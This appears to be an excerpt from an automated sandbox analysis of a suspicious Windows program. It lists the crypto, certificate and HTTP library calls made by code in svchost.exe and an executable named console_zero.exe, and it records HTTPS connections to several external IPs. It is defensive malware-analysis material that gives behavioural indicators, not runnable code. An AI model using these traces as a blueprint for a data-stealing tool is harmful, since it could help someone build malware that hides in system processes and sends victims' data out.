          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9341F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A9341F30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9305FA0 CRYPTO_realloc,28_2_00007FF8A9305FA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A931FFD0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D9F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,28_2_00007FF8A92D9F90
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9337FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8A9337FE0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DBFF0 CRYPTO_THREAD_run_once,28_2_00007FF8A92DBFF0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A935BFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,28_2_00007FF8A935BFA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,28_2_00007FF8A92D321D
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F1210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,28_2_00007FF8A92F1210
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9323200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free,28_2_00007FF8A9323200
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9313220 CRYPTO_zalloc,CRYPTO_free,28_2_00007FF8A9313220
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D5240 CRYPTO_zalloc,CRYPTO_free,28_2_00007FF8A92D5240
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A930B2D0 CRYPTO_free,28_2_00007FF8A930B2D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F92F0 CRYPTO_realloc,memcpy,28_2_00007FF8A92F92F0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931F290 CRYPTO_realloc,28_2_00007FF8A931F290
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93592A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A93592A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F32C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,28_2_00007FF8A92F32C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A934B140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,28_2_00007FF8A934B140
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E9120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,28_2_00007FF8A92E9120
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A930D100 CRYPTO_free,28_2_00007FF8A930D100
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9321127 CRYPTO_realloc,28_2_00007FF8A9321127
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FD140 CRYPTO_free,CRYPTO_malloc,28_2_00007FF8A92FD140
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93251D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free,28_2_00007FF8A93251D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93051E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,28_2_00007FF8A93051E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9325190 BIO_free,CRYPTO_free,28_2_00007FF8A9325190
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933B420 CRYPTO_free,28_2_00007FF8A933B420
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FD440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92FD440
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9341430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,28_2_00007FF8A9341430
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933D4E0 ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8A933D4E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93474E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A93474E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F34E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,28_2_00007FF8A92F34E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933B4A0 CRYPTO_free,CRYPTO_free,28_2_00007FF8A933B4A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A930B4B0 CRYPTO_zalloc,28_2_00007FF8A930B4B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FD310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92FD310
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9355360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8A9355360
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A934B370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,28_2_00007FF8A934B370
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DD360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,28_2_00007FF8A92DD360
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E7360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,28_2_00007FF8A92E7360
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D13A0 CRYPTO_free,28_2_00007FF8A92D13A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9323380 CRYPTO_free,28_2_00007FF8A9323380
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93493A0 ERR_new,ERR_set_debug,CRYPTO_clear_free,28_2_00007FF8A93493A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9351650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A9351650
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F3650 CRYPTO_THREAD_unlock,28_2_00007FF8A92F3650
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9339620 CRYPTO_malloc,ERR_new,ERR_set_debug,28_2_00007FF8A9339620
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93236D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A93236D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93376D0 CRYPTO_free,28_2_00007FF8A93376D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A934B6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,28_2_00007FF8A934B6E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92ED68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free,28_2_00007FF8A92ED68B
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93056D0 CRYPTO_zalloc,28_2_00007FF8A93056D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D36C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,28_2_00007FF8A92D36C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93416B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8A93416B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9339540 OPENSSL_cleanse,CRYPTO_free,28_2_00007FF8A9339540
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A935B550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A935B550
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DB500 CRYPTO_free,28_2_00007FF8A92DB500
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E5500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,28_2_00007FF8A92E5500
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F5550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,28_2_00007FF8A92F5550
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F75B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,28_2_00007FF8A92F75B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93275D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A93275D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D9590 CRYPTO_free,CRYPTO_memdup,28_2_00007FF8A92D9590
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933B5E0 CRYPTO_free,28_2_00007FF8A933B5E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A930B5F0 CRYPTO_free,28_2_00007FF8A930B5F0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,28_2_00007FF8A933D5F0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933B590 CRYPTO_free,28_2_00007FF8A933B590
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D15D0 CRYPTO_free,28_2_00007FF8A92D15D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93395A0 CRYPTO_free,28_2_00007FF8A93395A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D35C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,28_2_00007FF8A92D35C8
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E3820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc,28_2_00007FF8A92E3820
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A934985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8A934985F
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933B870 CRYPTO_free,28_2_00007FF8A933B870
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D7870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,28_2_00007FF8A92D7870
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D9850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,28_2_00007FF8A92D9850
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E5840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,28_2_00007FF8A92E5840
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F3840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92F3840
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93438C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,28_2_00007FF8A93438C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933B8C0 CRYPTO_free,28_2_00007FF8A933B8C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A930B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A930B8D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93318D0 CRYPTO_free,28_2_00007FF8A93318D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93218E9 CRYPTO_malloc,CRYPTO_free,28_2_00007FF8A93218E9
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93078D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A93078D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9345760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A9345760
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E3700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92E3700
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D1740 CRYPTO_zalloc,CRYPTO_free,28_2_00007FF8A92D1740
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E5780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host,28_2_00007FF8A92E5780
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83C04A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free,28_2_00007FF8B83C04A6
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,28_2_00007FF8B8372B80
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83C2CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,28_2_00007FF8B83C2CC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83BFF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,28_2_00007FF8B83BFF30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83C31F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,28_2_00007FF8B83C31F0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,34_2_00007FF8B8372B80
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83C2CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,34_2_00007FF8B83C2CC0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83BFF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,34_2_00007FF8B83BFF30
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83C31F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,34_2_00007FF8B83C31F0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83A74E0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,34_2_00007FF8B83A74E0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83C04A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,34_2_00007FF8B83C04A6
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83A7560 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,34_2_00007FF8B83A7560
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83A75F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,34_2_00007FF8B83A75F0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83916F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,34_2_00007FF8B83916F0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B8391820 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,34_2_00007FF8B8391820
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83918A0 CryptHashData,34_2_00007FF8B83918A0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83C28A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext,34_2_00007FF8B83C28A0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83918B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,34_2_00007FF8B83918B0
          Source: svchost.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
          Source: C:\Windows\System32\svchost.exeCode function: mov dword ptr [rbp+04h], 424D53FFh28_2_00007FF8B83A8DE0
          Source: C:\Windows\System32\console_zero.exeCode function: mov dword ptr [rbp+04h], 424D53FFh34_2_00007FF8B83A8DE0
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49885 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49965 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49985 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49994 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49997 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50005 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50008 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50011 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50014 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50017 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50020 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50024 version: TLS 1.2
          Source: app64.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp
          Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.13.dr
          Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.13.dr
          Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
